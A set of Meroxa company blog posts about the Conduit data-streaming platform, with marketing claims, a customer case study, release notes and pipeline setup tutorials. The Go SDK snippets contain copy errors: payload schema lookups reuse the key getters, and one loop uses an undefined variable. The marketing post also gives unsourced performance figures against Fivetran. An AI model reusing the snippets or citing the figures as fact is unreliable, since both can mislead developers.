The benefits of real-time data are clear, but implementation has traditionally been a significant hurdle. This is where modern data infrastructure platforms come into play. At Meroxa, we've built our platform specifically to address these challenges, offering:

Seamless integration with existing data sources that support the vector datatype
Built-in stream processing to automate data preparation
Automatic scaling to handle varying data volumes
Enterprise-grade security and compliance features

The Future is Real-Time

As AI continues to evolve and become more deeply embedded in business operations, the importance of real-time data will only grow. Organizations that invest in robust real-time data infrastructure today will be better positioned to:

Deploy more accurate and reliable AI models
Respond faster to changing market conditions
Reduce their overall AI infrastructure costs
Stay ahead of competitors in AI-driven innovation

Getting Started

The shift to real-time data doesn't have to be overwhelming. Start by identifying one critical AI model in your organization that would benefit from fresher data. Consider the current refresh rate, the cost of retraining, and the impact of model drift on your business outcomes.

At Meroxa, we've helped organizations across industries make this transition successfully. Whether you're just starting your AI journey or looking to optimize existing models, we have the expertise and technology to help you implement real-time data pipelines that drive better AI outcomes. Remember, in the world of AI, your models are only as good as the data they learn from. Make sure that data is as fresh and relevant as possible.

*Want to learn more about implementing real-time data pipelines for your AI infrastructure? Sign up today!

Meroxa’s Conduit Platform: Real-Time Data Movement at Scale, with Proven Performance

Dion Keeton — Wed, 20 Nov 2024 05:42:26 GMT

In the state of big data real-time movement isn't just a luxury—it's a necessity. Tools like Fivetran, while useful for batch processing, can’t deliver the performance required for real-time operations at scale. Meroxa’s Conduit Platform stands apart, providing real-time data streaming with unmatched scalability, all while empowering businesses to own and manage their data lakes and warehouses.

But how does Meroxa’s performance stack up? Let’s explore the numbers.

Real-Time vs. Batch: The Meroxa Advantage

Real-time processing isn’t just faster—it’s transformative. Meroxa’s Conduit Platform is optimized to deliver up to 90% faster data delivery compared to batch-based systems like Fivetran. This means businesses can act on insights almost instantaneously rather than waiting minutes or hours for batch updates.

Performance Highlights:

99.9% data delivery reliability across real-time pipelines, even during peak loads.
80% reduction in data latency, enabling near-instantaneous responses to critical events.
4x throughput capacity compared to traditional ETL tools, supporting millions of events per second.

Bring Your Own Data Lake or Warehouse (BYO)

Unlike Fivetran’s managed approach, which often locks businesses into proprietary systems, Meroxa’s Conduit Platform embraces flexibility. With Meroxa, you can leverage your existing data lake or warehouse infrastructure—whether that’s AWS S3, Snowflake, BigQuery, or others—while enjoying the performance benefits of real-time streaming.

Benefits of the BYO Approach:

Cost Savings: Businesses report up to 60% lower infrastructure costs by eliminating the need for redundant storage and managed services.
Full Control: Maintain ownership of your data, ensuring compliance, security, and flexibility.
Seamless Integration: Build pipelines tailored to your unique architecture, avoiding the limitations of one-size-fits-all solutions.
Scalable Performance: Stream data directly to your data lake or warehouse, ensuring it’s ready for analysis with 50% faster ingestion times compared to batch systems.

Scalability and Flexibility: Built for Enterprise Loads

Meroxa’s Conduit Platform is built to handle the most demanding use cases. With elastic scaling, the platform easily supports high-throughput environments without sacrificing performance.

Key Metrics:

Handles up to 10 million events per second, ensuring seamless scalability for even the largest organizations.
50% faster pipeline deployment, reducing time-to-market for data integration projects.
Zero downtime during scaling events, guaranteeing uninterrupted operations.

Real-World Use Cases with Proven Results

Real-Time Fraud Detection

A fintech company leveraged Meroxa to stream transactional data in real time to its data lake for fraud detection. The result? 90% faster anomaly detection, reducing fraud losses by millions annually.

Dynamic Inventory Management

An e-commerce platform used Meroxa’s Conduit Platform to synchronize inventory data across warehouses in real time. This enabled 95% accuracy in stock levels, minimizing missed sales and overstocking.

Personalized Customer Engagement

A streaming service processed user behavior data with Conduit, achieving 85% faster recommendation updates, leading to a 30% increase in customer engagement and retention rates.

Meroxa vs. Fivetran: A Performance Comparison

Unlock Real-Time Data Movement at Scale

Meroxa’s Conduit Platform offers unmatched real-time data movement performance, giving you the speed, flexibility, and scalability to stay ahead of the competition. Whether you’re optimizing fraud detection, inventory management, or customer engagement, Conduit delivers the power you need to make data-driven decisions faster and more efficiently.

Experience performance at scale and control your data destiny—choose Meroxa.

Case Study: Streamlining Data Flow for The Hotels Network with Meroxa

Dion Keeton — Wed, 13 Nov 2024 01:15:54 GMT

Client Overview

The Hotels Network (THN) is a leading technology company in the hospitality sector, offering innovative tools to enhance guest experiences and optimize revenue. The Hotels Network (THN) approached us to help address a critical challenge—managing the data silo between their sales and support teams. This disconnect was hindering their ability to operate efficiently and gain a unified view of customer interactions. By streamlining their data flows and integrating their systems, we were able to bridge the gap between sales and support, ultimately increasing THN's operational efficiency and enhancing its ability to deliver a seamless customer experience.

In the face of rising costs and operational complexity; THN needed a more streamlined solution that would support and scale their daily volume efficiently without compromising security.

Challenges

The Hotels Network (THN) faced significant challenges due to fragmented insights and disconnected data streams between their sales and support teams. This siloed data made it difficult to achieve a unified view of customer interactions and hindered efficient communication. Their complex architecture, built on multiple data streaming services, added layers of cost and complexity, making it hard to manage and scale effectively. On top of this, the organization needed to handle high volumes of data, processing around 100 daily events, each with numerous data elements, which created operational bottlenecks and inefficiencies. These challenges underscored the need for a streamlined, integrated approach to data management that could support both high throughput and seamless cross-functional insights.

Solution Overview

Meroxa provided THN with a comprehensive data integration solution using their

Conduit Platform

to streamline the flow of data between Salesforce and Redpanda. By creating a unified pipeline, Meroxa simplified the architecture, reducing operational costs and providing real-time updates.

Key Components of the Solution

Salesforce Integration
- Meroxa set up a Salesforce trigger and platform event configuration to publish key events in real-time.
- This ensured that customer interactions and property data were kept up-to-date without manual interventions, improving the overall flow of data from the sales to the support teams.
- We've configured the Salesforce platform event to publish different event types, and Meroxa was able to handle them as expected using multiple Topics
- Meroxa was able to adapt the JSON format to be published in Redpanda to the specifications of the customer's team. This helped us to keep a consistent JSON notation with other integrated systems.
Redpanda Cluster Setup
- Meroxa configured a Redpanda cluster, managing topics with secure Access Control Lists (ACL) and authentication mechanisms to protect data and ensure seamless, secure connections between the systems.
Meroxa Conduit Platform
- The entire pipeline was managed using Meroxa’s platform, which consumed Salesforce events and streamed them into Redpanda. Secrets management for secure credentials and connection monitoring was handled through Meroxa, providing a centralized and reliable data flow infrastructure.
- The solution was designed to support THN’s current data volume and had the flexibility to scale as their business grows.

Implementation Timeline

Phase 1: Initial consultation and requirements gathering.
Phase 2: Salesforce and Redpanda integration setup (1 week).
Phase 3: Testing and troubleshooting (2 weeks).
Phase 4: Full deployment and production (within 1 month from project start).

"The Meroxa team worked with us to design, build & deploy an efficient low-code solution to connect our Salesforce org with our internal backend system via the Redpanda streaming platform."

David Sanchez Carmona

Senior GTM Systems Manager

Results and Benefits

Improved Data Flow
- With the consolidated data pipeline, THN eliminated siloed data between Salesforce and Redpanda, achieving a unified, seamless data flow.
- Data updates are now processed in real-time, enabling faster response times and improved service levels.
Reduced Operational Costs
- By streamlining its architecture and eliminating the need for multiple data streaming services, THN reduced operational complexity and cut costs by up to 30%.
Real-Time Insights
- Real-time data streaming from Salesforce into Redpanda allowed THN to make informed decisions quickly, enhancing customer support with more timely responses to customer interactions.
Scalability
- The solution provided by Meroxa offers a flexible and scalable platform, allowing THN to handle current data volumes and easily expand as their needs grow.

"By publishing event messages in Salesforce's Apex to Meroxa, we've enabled our Client Success team to speed up the onboarding process for new clients and a more reduced number of data entry issues".

David Sanchez Carmona

Senior GTM Systems Manager

Conclusion

Meroxa’s Conduit Platform has transformed THN’s data architecture by providing a streamlined, scalable, and cost-effective solution to manage their data flow between Salesforce and Redpanda. With real-time insights, reduced complexity, and lower operational costs, THN is now positioned to enhance its customer service capabilities and optimize its operations for future growth.

By consolidating multiple services into a single, efficient pipeline, THN can continue to innovate and scale, with a future-proof infrastructure capable of adapting to their evolving needs.

Conduit Operator v0.02 with Schema Registry Support!

Lyubo Kamenov — Fri, 25 Oct 2024 03:47:02 GMT

We are thrilled to announce the release of Conduit Operator v0.0.2, designed to simplify the management and orchestration of Conduit instances within Kubernetes.

What Is the Conduit Operator?

The Conduit Operator extends the Kubernetes API, allowing users to manage Conduit instances as custom resources. These resources define how each Conduit pipeline is provisioned and managed throughout its lifecycle, giving you full control over your data flow while leveraging Kubernetes-native features like scaling, monitoring, and logging.

Conduit pipelines can be declared using YAML configuration, much like how any other Kubernetes resources are configured and deployed. This flexibility allows you to integrate your data streaming processes into existing DevOps workflows and infrastructure management tools with ease.

A Glimpse into Conduit Custom Resources

Conduit pipelines are represented as Kubernetes custom resources, where each pipeline runs as its own distinct Conduit instance. Below is a basic example of how a Conduit pipeline is defined:

apiVersion: operator.conduit.io/v1alpha
kind: Conduit
metadata:
  name: conduit-generator
spec:
  running: true
  name: generator.log
  description: generator pipeline
  connectors:
    - name: source-connector
      type: source
      plugin: builtin:generator
      settings:
        - name: format.type
          value: structured
        - name: format.options.id
          value: "int"
        - name: format.options.name
          value: "string"
        - name: format.options.company
          value: "string"
        - name: format.options.trial
          value: "bool"
        - name: recordCount
          value: "3"
    - name: destination-connector
      type: destination
      plugin: builtin:log

This configuration provides a declarative way to manage data pipelines, reducing the manual overhead typically required to build and manage streaming architectures.

Streamlining Connector Management

Using standalone connector with the Conduit Operator is simplified by allowing them to be hot loaded through GitHub repositories rather than included into the instance image.

# github.com/conduitio/conduit-connector-generator will be build and loaded
# by the operator.
- name: source-connector
  type: source
  plugin: conduitio/conduit-connector-generator
  pluginVersion: v0.8.0
  settings:
    ...

The operator automatically provisions and manages the necessary resources to run the connectors. These connectors, sourced from organizations like conduitio, meroxa, and conduitio-labs, provide out-of-the-box integrations with popular systems.

Schema Support for Enhanced Data Handling

As of Conduit v0.11.0, the platform supports schema registries, which allows connectors to encode and decode data using predefined schemas. This enables more robust data management and ensures compatibility between different data systems.

An example configuration for utilizing a schema registry looks like this:

apiVersion: operator.conduit.io/v1alpha
kind: Conduit
metadata:
  name: conduit-generator-schema-registry
spec:
  schemaRegistry:
    url: http://apicurio:8080/apis/ccompat/v7
    basicAuthUser:
      - value: <schemaUser>
    basicAuthPassword:
      - secretRef:
        key: schema-registry-password
        name: schema-registry-secret

This level of flexibility is essential for businesses dealing with large-scale data integrations, as it allows multiple Conduit instances to share a schema registry across different environments and scale pipelines independently.

Deploying Conduit Operator

Deployment of the Conduit Operator can be done via Helm, a popular Kubernetes package manager. By using Helm charts, you can easily manage deployments, scaling, and updates of Conduit instances within your Kubernetes clusters.

To deploy the operator, you can simply run:

helm repo add conduit https://conduitio.github.io/conduit-operator
helm install conduit-operator \
    conduit/conduit-operator --create-namespace -n conduit-operator

Monitoring and Scaling with Kubernetes

One of the key advantages of the Conduit Operator is its integration with Kubernetes-native features. For example, you can add annotations to your Conduit instances to automatically scrape metrics using Prometheus:

This is achieved by customizing the Helm value file when deploying the operator. Future work will allow for these annotations to be placed directly on the Conduit resource.

# Create values.yaml using these settings
controller:
  conduitMetadata:
    podAnnotations:
      prometheus.io/scrape: true
      prometheus.io/path: /metrics
      prometheus.io/port: 8080
      
# Install or upgrade the operator via helm
helm install conduit-operator \
    conduit/conduit-operator --create-namespace -n conduit-operator \
    -f values.yaml

This seamless integration enables robust monitoring and scaling options, ensuring your data pipelines are optimized for performance and reliability.

Why Use Conduit Platform?

While the Conduit Operator offers a robust solution for managing data pipelines within Kubernetes, the Conduit Platform takes this further by providing a low-code experience and additional enterprise features. With the Conduit Platform, you can easily build, monitor, and scale complex data pipelines with minimal manual effort.

Key advantages of using the Conduit Platform include:

Low-Code Interface: Quickly configure and manage pipelines without extensive coding.
Enterprise Features: Enhanced security, monitoring, and scaling options tailored for large-scale enterprise needs.
Streamlined Workflows: Easily connect disparate data sources and sinks, optimizing data flow across your infrastructure.

Whether you're looking to deploy individual instances with Conduit Operator or scale enterprise-wide with the Conduit Platform, Meroxa provides the tools and flexibility to manage your data pipelines efficiently.

Conclusion

The Conduit Operator simplifies data pipeline management in Kubernetes environments, enabling you to easily manage data streams. For businesses looking to scale, integrate complex data systems, and optimize their operations, the Conduit Platform provides a powerful low-code solution that expands on the capabilities of the Conduit Operator.

Get started with Conduit Operator on GitHub and take your data pipeline management to the next level with the Conduit Platform for a low-code, enterprise-ready experience. Also check out our documentation.

Looking for managed platform solutions? Check out our Conduit Platform by requesting a demo. Let's build the future of data integration together!

Unlocking Resilience: Conduit v0.12.0 Introduces Pipeline Recovery

Haris Osmanagić — Fri, 11 Oct 2024 16:20:16 GMT

Hey, data streaming fans! The Conduit team is happy to inform you that Conduit v0.12 has just been released! As we prepare for the launch of Conduit v1, one of the key things we’ve been focusing on is how to make our pipelines more resilient. We believe this is a crucial step in preparing for the 1.0 major release.

Many in the data streaming world know that there is no such thing as a pipeline that is always running. Most pipeline errors encountered are a result of temporary issues like network interruptions or services being unavailable due to maintenance. It then becomes a matter of how we handle the pipeline.

In most cases, simply retrying is enough to get through transient errors efficiently. This can and should be done by connectors and processors. But what if they don’t have a proper backoff implementation? For Conduit users, this typically means they would need to wait for the connector or processor to be updated. That’s where Conduit’s pipeline recovery comes in.

How does it work?

If a pipeline experiences an error such as a source connector cannot read a record or a processor fails to process a record, the pipeline is stopped and the status is set to degraded.

Pipeline recovery in Conduit v0.12 by default will restart the pipeline that experienced the error. However, you can always disable this feature if needed.

Conduit restarts a previously failed pipeline using a backoff algorithm for which the parameters can be tuned with CLI flags, environment variables, or a global configuration file. We’ll explain this behavior through the following scenario, assuming that the default backoff settings are used.

A PostgreSQL-to-MongoDB pipeline starts.
After some time, the source PostgreSQL instance becomes unavailable. This results in an error that causes the pipeline to stop.
Conduit waits for 1 second and restarts the pipeline.
The pipeline fails again because the source PostgreSQL instance is still unavailable. The waiting is multiplied by 2, so Conduit waits for 2 seconds.
Step 4 is repeated until the pipeline is running. Maximum waiting time is 10 minutes.

Here's a diagram of the algorithm:

By default, there’s no limit on the number of retries. If the retries are limited, then Conduit will also make sure that the recovery attempts are reset smartly so that:

Recovery attempts are not tracked indefinitely. That would cause, for example, a pipeline to transition into the degraded state because it failed 3 times in the past 12 months.
A pipeline is not being restarted indefinitely because it manages to start just before the maximum number of retries, and after some time, it fails again.

The documentation for pipeline recovery can be found here. As always, the Conduit team is happy to hear any feedback you might have about this feature! You can find us on our Discord server or you can start a new GitHub discussion!

Streaming Data from MongoDB to ClickHouse using Conduit Platform

Tanveet Gill — Mon, 23 Sep 2024 18:04:46 GMT

The new world of data is requiring the ability to move data quickly and efficiently across systems and, is vital for organizations seeking to gain real-time insights. Streaming data from sources like MongoDB to powerful analytics databases like ClickHouse can unlock opportunities for faster decision-making and more responsive applications. In this blog, we will walk through the technical process of setting up a real-time data streaming pipeline from MongoDB to ClickHouse using Conduit, an open-source data integration tool designed for high-performance streaming.

This guide builds on our previous demonstration of moving data from PostgreSQL to ClickHouse, and we’ll now shift our focus to MongoDB as the source of our real-time data.

Why Stream Data from MongoDB to ClickHouse?

MongoDB is a popular NoSQL database well-suited for managing large volumes of flexible, unstructured data. However, as applications grow and the need for real-time analytics arises, MongoDB may not be optimized for complex analytical queries at scale. This is where ClickHouse comes in—known for its lightning-fast analytical capabilities, it is perfect for handling high-velocity, complex queries over large datasets.

By streaming data from MongoDB to ClickHouse, organizations can:

Perform real-time analytics on transactional data.
Benefit from ClickHouse’s OLAP (Online Analytical Processing) strengths.
Visualize large data sets with minimal latency using tools like Grafana.
Ensure scalability and maintain performance as the system grows.

Setting Up the Pipeline: Streaming from MongoDB to ClickHouse

Now, let’s dive into the technical steps required to set up a real-time data streaming pipeline from MongoDB to ClickHouse using Conduit.

Step 1: Installing Conduit

First, you’ll need to install Conduit, which acts as the backbone of our data pipeline. The setup process is straightforward:

Head to the Conduit installation documentation to download the binary for your platform.
Follow the instructions to install and run Conduit on your system.

Once installed, you should have the conduit command available in your terminal. This will be used to manage and run our data pipeline.

Step 2: Setting Up MongoDB and ClickHouse

MongoDB Configuration

If you haven’t already, install MongoDB:

brew tap mongodb/brew
brew install mongodb-community@5.0
brew services start mongodb/brew/mongodb-community

Next, create a user and a database collection in MongoDB:

mongo
use admin
db.createUser({
  user: "MONGO_USER",
  pwd: "MONGO_PASS",
  roles: [{ role: "readWrite", db: "meroxa" }]
})

use meroxa
db.createCollection("users")

Finally add some sample data you want to see streamed over to Clickhouse:

db.users.insertOne({ name: "Alice", email: "alice@example.com" })
db.users.insertOne({ name: "Bob", email: "bob@example.com" })
db.users.insertOne({ name: "Charlie", email: "charlie@example.com" })

Setting Up ClickHouse

For ClickHouse, you can use the following commands to set up the required table. This ensures that ClickHouse has the correct schema to receive the streamed data from MongoDB:

curl --user 'USERNAME:PASSWORD' \
  --data-binary 'CREATE TABLE meroxa.users (
      _id String,
      name String,
      email String
  ) ENGINE = MergeTree()
  ORDER BY _id' \
  ${CLICKHOUSE_URL}

Note: Once you set up a ClickHouse instance or set up a ClickHouse trial on their website, you can find the connect button to get the username, password, and ClickHouse URL to make API calls to your instance.

Step 3: Installing the Required Connectors

Conduit uses connectors to interface with data sources and sinks. In our case, we’ll use the MongoDB source connector and the ClickHouse destination connector.

Download the Connectors: Clone the connectors from the official GitHub repositories:

Build the Connectors: After cloning the repositories, navigate into each directory and run make build to build the connectors.
Move the Connectors to the Project Directory: Place the compiled connectors into the connectors/ folder in your project:

├── connectors
│   ├── conduit-connector-clickhouse
│   └── conduit-connector-mongo

Step 4: Define the Data Pipeline in YAML

Here is a YAML configuration file (mongo-to-clickhouse.yaml) that defines the pipeline for moving data from MongoDB to ClickHouse:

version: 2.2
pipelines:
  - id: mongo-to-ch
    status: running
    description: >
      This pipeline showcases real-time data streaming from MongoDB to Clickhouse.
    connectors:
# [CONNECTOR] SOURCE
      - id: mongo-source
        type: source
        plugin: standalone:mongo
        settings:
          uri: "mongodb://MONGO_USER:MONGO_PASS@MONGO_URL:PORT/MONGO_DB?authSource=admin"
          db: "MONGO_DB"
          collection: "users"
          auth.username: "MONGO_USER"
          auth.password: "MONGO_PASS"
          auth.mechanism: "SCRAM-SHA-256"
# [CONNECTOR] DESTINATION
      - id: clickhouse-sink
        type: destination
        plugin: standalone:clickhouse
        settings:
          url: "https://USERNAME:PASSWORD@CLICKHOUSE_URL?secure=true"
          table: "users"
          keyColumns: "id"

This pipeline is configured to move data from the users collection in MongoDB to the users table in ClickHouse in real-time.

Step 5: Running the Pipeline

With everything set up, you can now run the pipeline with a single command:

./conduit

Once the pipeline is running, any changes made to the users collection in MongoDB will be streamed in real-time to the users table in ClickHouse.

Once your pipeline is running, you can visit http://localhost:8080/ui You will see your pipeline defined here. You will also have the ability to inspect the stream to see records that are coming in in real-time from MongoDB and going to ClickHouseDB.

Conclusion

By following these steps, you can easily set up a real-time data streaming pipeline from MongoDB to ClickHouse using Conduit. This allows you to leverage the best of both worlds—MongoDB’s flexible data model and ClickHouse’s powerful analytics capabilities. With minimal setup, you can move large amounts of data efficiently and gain actionable insights in real time, making it perfect for organizations looking to optimize their data workflows.

Click here to schedule a demo today! Stay tuned for future blogs, where we’ll dive deeper into advanced transformations and optimizations you can apply within your streaming pipelines!

Building Real-Time Analytics Dashboards with Conduit, Postgres and Clickhouse

Tanveet Gill — Mon, 26 Aug 2024 20:32:32 GMT

In today's fast-paced business world, staying competitive and agile is more important than ever. Real-time analytics have become essential for companies looking to keep up with rapid changes and make informed decisions quickly. These analytics provide immediate insights into business operations, customer behavior, and market trends, enabling organizations to respond with speed and precision.

However, while there are many tools available for querying and analyzing data, getting that data into a format that’s easy to work with can still be a major hurdle. Many teams find themselves juggling multiple vendors to handle data ingestion, cleansing, augmentation, orchestration, streaming, and storage. This can be both costly and complicated.

In this post, we’ll guide you through how to simplify this process using Meroxa’s Conduit Platform. We’ll show you how to build real-time analytics dashboards by pulling data from Postgres, processing it with Clickhouse, and displaying the results in Grafana. This approach streamlines your data pipeline, making it easier and more efficient to gain the insights your business needs.

Why Are Teams Choosing Clickhouse for Analytics?

ClickHouse has established itself as a prominent database for analytical applications due to its technical advantages over competitors like Druid, Pinot, and StarRocks. Its columnar storage engine and vectorized query execution enable efficient data compression and parallel processing, resulting in superior query performance on large datasets. ClickHouse's architecture supports both batch and streaming data ingestion, offering flexibility that surpasses Druid and Pinot, which are optimized for specific workloads. The database's ACID compliance and support for materialized views further enhance its capabilities for real-time analytics.

Compared to Druid, ClickHouse offers a more comprehensive SQL support and a simpler architecture, reducing operational complexity. While Pinot excels in low-latency queries, ClickHouse provides better write throughput and more extensive analytical functions. StarRocks, though competitive, lacks the maturity and extensive ecosystem of ClickHouse. ClickHouse's ability to handle diverse data models, including nested structures, and its support for various index types (e.g., skip indexes, primary key indexes) contribute to its versatility.

Furthermore, ClickHouse's distributed architecture allows for horizontal scaling, enabling it to process petabytes of data across clusters. Its support for approximate query processing techniques, like reservoir sampling and HyperLogLog, facilitates efficient analytics on massive datasets. These technical features, combined with its active open-source community and growing ecosystem of tools, position ClickHouse as a robust choice for building scalable and high-performance analytical applications.

Step-by-Step Guide to Setting Up a PostgreSQL to ClickHouse Pipeline Using Meroxa Conduit

Download Conduit Binary: Follow the Conduit Quickstart to download and install the Conduit binary on your local machine.
Download & Install Connectors:
1. PostgreSQL Connector: Conduit PostgreSQL Connector
2. ClickHouse Connector: Conduit ClickHouse Connector
Refer to Installing Connectors for more information.

Example PostgreSQL table with user purchases data.
Provision Secrets for PostgreSQL and ClickHouse:
1. PostgreSQL Connection String: postgres://:@:/
2. ClickHouse Connection String: https://:@:/?secure=true

Set Up Your Conduit Pipeline YAML:

Example YAML Configuration:

version: 2.2
pipelines:
  - id: pg-to-ch
    status: running
    description: >
      This pipeline showcases real-time data streaming from Postgres to ClickHouse.
    connectors:
# [CONNECTOR] SOURCE
      - id: pg-source
        type: source
        plugin: standalone:postgres
        settings:
          url: "postgres://yourusername:yourpassword@yourhost:5432/yourdatabase"
          tables: "user_purchases"
# [CONNECTOR] DESTINATION
      - id: clickhouse-sink
        type: destination
        plugin: standalone:clickhouse
        settings:
          url: "https://yourusername:yourpassword@yourhost:8443/yourdatabase?secure=true"
          table: "user_purchases"
          keyColumns: "id"

Explanation of YAML Components:

• pipelines: Defines the pipeline configuration.

• id: Unique identifier for the pipeline.

• status: Defines the pipeline’s status (running/stopped).

• description: A brief description of the pipeline’s purpose.

• Connectors:

• Source Connector (pg-source):

• type: Specifies the connector type (source).

• plugin: The plugin type (PostgreSQL).

• settings: Contains the PostgreSQL connection settings.

• Destination Connector (clickhouse-sink):

• type: Specifies the connector type (destination).

• plugin: The plugin type (ClickHouse).

• settings: Contains the ClickHouse connection settings.

Run the Pipeline:
1. Navigate to the directory containing your YAML file. Simply run Conduit by using the following command:
```
./conduit
```

Example data being transferred from PostgreSQL into Clickhouse.

This will automatically execute any pipeline files located in the ./pipelines directory.

Access the Conduit UI at localhost:8080 to monitor and manage the pipeline.

Conduit UI showcasing current pipelines running. You can have as many pipelines you want here.

Example Conduit pipeline showcasing the connectors used and ability to inspect the data stream.

Use Cases for PostgreSQL to ClickHouse CDC

Financial Services: Real-time fraud detection and transaction monitoring become seamless with up-to-date data flowing from PostgreSQL to ClickHouse.

E-commerce: Enhance customer experience by providing real-time product recommendations and personalized marketing based on the latest data.

IoT Applications: Process and analyze massive streams of IoT data in real time, enabling predictive maintenance and operational efficiency.

Best Practices for Implementing CDC with Meroxa

Plan Your Data Flow: Understand your data sources and destinations, and plan the flow of data to ensure optimal performance.
Automate Data Transformations: Use Meroxa’s transformation features to automate data cleaning and preparation, ensuring high-quality data in ClickHouse.
Monitor Continuously: Regularly monitor your CDC pipelines to identify and resolve any issues promptly, ensuring uninterrupted data flow.

Conclusion

Implementing PostgreSQL to ClickHouse CDC with Meroxa's Conduit Platform provides a powerful solution for real-time data integration and analytics. By leveraging Meroxa's robust platform, businesses can ensure data consistency, scalability, and ease of use, empowering them to make data-driven decisions with confidence. Stay tuned for part 2 where we show you how to stream data from MongoDB into ClickHouse.

Ready to transform your data integration process? Request a demo of Meroxa's Conduit Platform today and see how you can seamlessly integrate PostgreSQL with ClickHouse for real-time analytics and insights. Check out the full demo video

Conduit v0.11 Unveils Powerful Schema Support for Enhanced Data Integration

Lovro Mažgon — Mon, 19 Aug 2024 17:35:07 GMT

We made it, Conduit v0.11 is here! In this latest release, we’ve focused on adding schema support, enabling you to detect schema changes and retain type information end-end. Our commitment is to make data integration more efficient and user-friendly, helping you optimize your data streaming workflows.

Schema Support

With the release of Conduit v0.11, one of the most significant enhancements is the support for schemas.

Key Highlights of Conduit v0.11

Schema Support: Manage and detect schema changes seamlessly. Conduit now preserves type information end-to-end, ensuring data integrity and type safety throughout the pipeline.
Schema Registry: Integrated schema registry within Conduit, with compatibility for Confluent Schema Registry. Easily manage and fetch schemas without deploying separate services.
Connector Enhancements: New and improved connector SDK for working with schemas, simplifying the process of data encoding, decoding, and transformation.
Processor Improvements: Enhanced processor SDK with schema support, allowing for more accurate and reliable data processing.
Documentation Search: Quickly find the information you need with our new search feature in the Conduit documentation.

The primary benefits of schema support include:

Data Integrity: Ensures that data adheres to the expected structure, reducing the risk of errors and inconsistencies.
Type Safety: Retains type information throughout the data pipeline, allowing for safe and accurate data processing.
Future-Proofing: Prepares the system to handle evolving data structures, making it easier to adapt to changes without significant disruptions.

In the following sections, we will delve into the specifics of how schema support is implemented in Conduit, including the schema registry, connectors, processors, and additions to the OpenCDC record format.

Schema Registry

The Schema Registry is now a built-in component of Conduit, enabling the usage of schemas in Conduit pipelines out of the box without deploying a separate service.

Check out the source of the Conduit Schema Registry. It is written in Go, meaning that it can be compiled into Conduit and is used internally as the default schema registry. We have also written a test suite, which runs against our schema registry as well as the Confluent Schema Registry, ensuring their compatibility. The Conduit Schema Registry currently supports only a subset of the features, however, the long-term goal is to make it fully compatible and allow it to be run as a standalone service.

Conduit also allows you to configure an external schema registry that’s compatible with the Confluent Schema Registry API.

schema-registry:
  type: "confluent"
  confluent:
    connection-string: "http://localhost:8085"

This snippet of the conduit.yaml file shows how to configure Conduit to connect to a Confluent Schema Registry instance. Check out the documentation for more information.

Schemas and OpenCDC records

We have added support for attaching schemas to OpenCDC records by introducing four standard metadata fields. These fields provide the required information to identify and fetch a specific schema from a schema registry.

opencdc.key.schema.subject and opencdc.key.schema.version

These fields contain the schema subject and version for the data in the .Key field of the OpenCDC record.
opencdc.payload.schema.subject and opencdc.payload.schema.version

These fields contain the schema subject and version for the data in the .Payload.Before and .Payload.After fields.

Connectors

The latest Connector SDK includes several enhancements to simplify working with schemas.

First, we introduced the schema package, which contains utilities for retrieving and creating schemas in connectors. These utilities interact with Conduit’s Schema Registry. The returned schema can be used to encode and decode data, as well as traverse the schema and apply it to the destination resource (e.g. creating a destination table with the correct types).

Here’s an example:

package myConnector

import (
	"context"

	"github.com/conduitio/conduit-connector-sdk/schema"
	"github.com/conduitio/conduit-commons/opencdc"
)

/* ... */

func (d *Destination) Write(ctx context.Context, records []opencdc.Record) (int, error) {
	for i, r := range records {
		keySubject, _ := r.Metadata.GetKeySchemaSubject()
		keyVersion, _ := r.Metadata.GetKeySchemaVersion()
		keySchema, _ := schema.Get(ctx, keySubject, keyVersion)

		payloadSubject, _ := r.Metadata.GetKeySchemaSubject()
		payloadVersion, _ := r.Metadata.GetKeySchemaVersion()
		payloadSchema, _ := schema.Get(ctx, payloadSubject, payloadVersion)

		// use keySchema and payloadSchema ...
	}
}

We also introduced source middleware that extracts an Avro schema from structured data and encodes the value into Avro raw data. This alleviates the issue of losing type information, which previously affected standalone connectors. The source middleware is enabled by default in all connectors using the latest connector SDK, meaning that connectors don’t need any specific code to benefit from schema support.

Additionally, all destination connectors benefit from another middleware, which works in the opposite manner to the source middleware. If a record contains the new metadata fields with a subject and version, it will fetch the schema and decode the data into structured data. This ensures that both the destination and source connectors can work with structured data while preserving the correct type information end-to-end.

To find out more about the source and destination middleware check out the middleware documentation.

Processors

The Processor SDK now includes schema support, similar to the Connector SDK, making it easier to work with structured data in processors.

We have introduced a schema package in the processor SDK, which can be used to interact with Conduit’s Schema Registry. This package allows processors to retrieve and create schemas, ensuring that type information is preserved throughout data processing.

Here’s a snippet of how you could interact with the new schema package:

package myProcessor

import (
	"context"

	sdk "github.com/conduitio/conduit-processor-sdk"
	"github.com/conduitio/conduit-processor-sdk/schema"
	"github.com/conduitio/conduit-commons/opencdc"
)

/* ... */

func (p *Processor) Process(ctx context.Context, records []opencdc.Record) []sdk.ProcessedRecord {
	for i, r := range recs {
		keySubject, _ := r.Metadata.GetKeySchemaSubject()
		keyVersion, _ := r.Metadata.GetKeySchemaVersion()
		keySchema, _ := schema.Get(ctx, keySubject, keyVersion)

		payloadSubject, _ := r.Metadata.GetKeySchemaSubject()
		payloadVersion, _ := r.Metadata.GetKeySchemaVersion()
		payloadSchema, _ := schema.Get(ctx, payloadSubject, payloadVersion)

		// use keySchema and payloadSchema ...
	}
}

Additionally, processors are equipped with new middleware that automatically handles the encoding and decoding of data in records that have an attached schema. The middleware detects changes in data (e.g. new fields, deleted fields, changed field types) and updates the schema, bumping its version according to the applied changes. This middleware is enabled by default for all processors, ensuring seamless schema management without requiring any additional code in the processor implementation.

Other improvements

Apart from the schema support, we have added several other improvements in v0.11.

Documentation search

One of the most significant additions to our documentation is the introduction of a search bar. The search bar allows users to quickly locate the content they are looking for. This feature is especially useful for newcomers who are getting acquainted with Conduit, as it reduces the time spent navigating the documentation.

Connector improvements

Postgres connector

The latest release of the Postgres connector includes support for incremental snapshots in logical replication mode. This feature allows for safely executing snapshots of the current state before starting to stream changes. It is especially important for large tables, which can take hours or even days to snapshot. With this enhancement, an interrupted snapshot can be resumed from the last successfully synced position.

We also improved the management of logical replication slots, ensuring that slots created by Conduit are cleaned up when the pipeline is deleted.

These changes are included in the built-in Postgres connector, but feel free to check out the source for the connector here.

HTTP connector

The source connector has now become more flexible, allowing you to use JavaScript to specify the behavior for getting the request data and for parsing the response.

In the destination connector, we have added the ability to build the URL of the request using data from the incoming parameters.

Check out the HTTP connector source here.

Processor improvements

`error`

We introduced a new processor called error, which can be used to send a record to the DLQ (Dead Letter Queue) or fail the pipeline. It should always be used together with a condition, otherwise all records reaching this processor will produce an error.

